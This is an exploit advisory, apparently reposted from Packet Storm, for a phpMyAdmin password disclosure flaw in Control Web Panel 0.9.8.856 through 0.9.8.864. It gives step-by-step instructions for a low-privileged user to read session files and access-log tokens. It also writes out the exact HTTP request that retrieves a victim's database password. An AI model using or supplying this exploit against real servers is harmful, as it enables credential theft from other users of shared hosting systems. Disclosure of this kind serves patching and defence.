Control Web Panel 0.9.8.864 phpMyAdmin Password Disclosure

Control Web Panel versions 0.9.8.856 through 0.9.8.864 suffer from a phpMyAdmin password disclosure vulnerability.


MD5 | 350c05e4dacfce98d3811879f2066056

Download
Exploit Title       : CWP (Control Web Panel) phpMyAdmin password access
Date                : 20 Aug 2019
Exploit Author      : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage     : https://control-webpanel.com/
Software Link       : Not available, user panel only available for lastest version
Version             : 0.9.8.856 - 0.9.8.864 
Tested on           : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
CVE-Number          : CVE-2019-14782, CVE-2019-15235
Reference      : N/A

1. Login as an low privileged user
2. Get Session file name from path "/tmp" or /home/[USERNAME]/tmp/session/sess_xxxxxx"
3. Get token value from "/usr/local/cwpsrv/logs/access_log"
4. Make a request to obtain target password

GET /cwp_[token]/victim?module=pma HTTP/1.1
Host: 192.168.1.1:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Connection: close
Referer: https://192.168.1.1:2083/
Cookie: PHPSESSID=[sess_xxxxxx]

Source: packetstormsecurity.com
Related Posts